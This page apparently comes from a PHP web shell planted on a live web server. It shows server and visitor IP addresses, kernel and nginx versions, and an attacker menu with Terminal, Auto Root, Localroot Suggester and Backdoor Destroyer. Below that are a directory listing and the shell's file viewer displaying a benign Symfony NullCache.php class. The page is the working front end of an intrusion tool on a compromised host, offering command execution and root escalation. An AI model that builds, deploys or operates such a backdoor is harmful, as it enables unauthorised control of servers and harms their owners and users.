Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.19.255.50
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
myadmin /
vendor /
symfony /
cache /
Simple /
Delete
Unzip
Name
Size
Permission
Date
Action
AbstractCache.php
6.41
KB
-rw-r--r--
2021-02-05 18:32
ApcuCache.php
961
B
-rw-r--r--
2021-02-05 18:32
ArrayCache.php
5.26
KB
-rw-r--r--
2021-02-05 18:32
ChainCache.php
6.92
KB
-rw-r--r--
2021-02-05 18:32
DoctrineCache.php
1.08
KB
-rw-r--r--
2021-02-05 18:32
FilesystemCache.php
1.31
KB
-rw-r--r--
2021-02-05 18:32
MemcachedCache.php
1.11
KB
-rw-r--r--
2021-02-05 18:32
NullCache.php
1.91
KB
-rw-r--r--
2021-02-05 18:32
PdoCache.php
2.59
KB
-rw-r--r--
2021-02-05 18:32
PhpArrayCache.php
7.69
KB
-rw-r--r--
2021-02-05 18:32
PhpFilesCache.php
1.72
KB
-rw-r--r--
2021-02-05 18:32
Psr6Cache.php
579
B
-rw-r--r--
2021-02-05 18:32
RedisCache.php
1.15
KB
-rw-r--r--
2021-02-05 18:32
TraceableCache.php
6.28
KB
-rw-r--r--
2021-02-05 18:32
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Cache\Simple; use Psr\SimpleCache\CacheInterface as Psr16CacheInterface; use Symfony\Component\Cache\Adapter\NullAdapter; use Symfony\Contracts\Cache\CacheInterface; @trigger_error(sprintf('The "%s" class is deprecated since Symfony 4.3, use "%s" and type-hint for "%s" instead.', NullCache::class, NullAdapter::class, CacheInterface::class), \E_USER_DEPRECATED); /** * @deprecated since Symfony 4.3, use NullAdapter and type-hint for CacheInterface instead. */ class NullCache implements Psr16CacheInterface { /** * {@inheritdoc} */ public function get($key, $default = null) { return $default; } /** * {@inheritdoc} * * @return iterable */ public function getMultiple($keys, $default = null) { foreach ($keys as $key) { yield $key => $default; } } /** * {@inheritdoc} * * @return bool */ public function has($key) { return false; } /** * {@inheritdoc} * * @return bool */ public function clear() { return true; } /** * {@inheritdoc} * * @return bool */ public function delete($key) { return true; } /** * {@inheritdoc} * * @return bool */ public function deleteMultiple($keys) { return true; } /** * {@inheritdoc} * * @return bool */ public function set($key, $value, $ttl = null) { return false; } /** * {@inheritdoc} * * @return bool */ public function setMultiple($values, $ttl = null) { return false; } }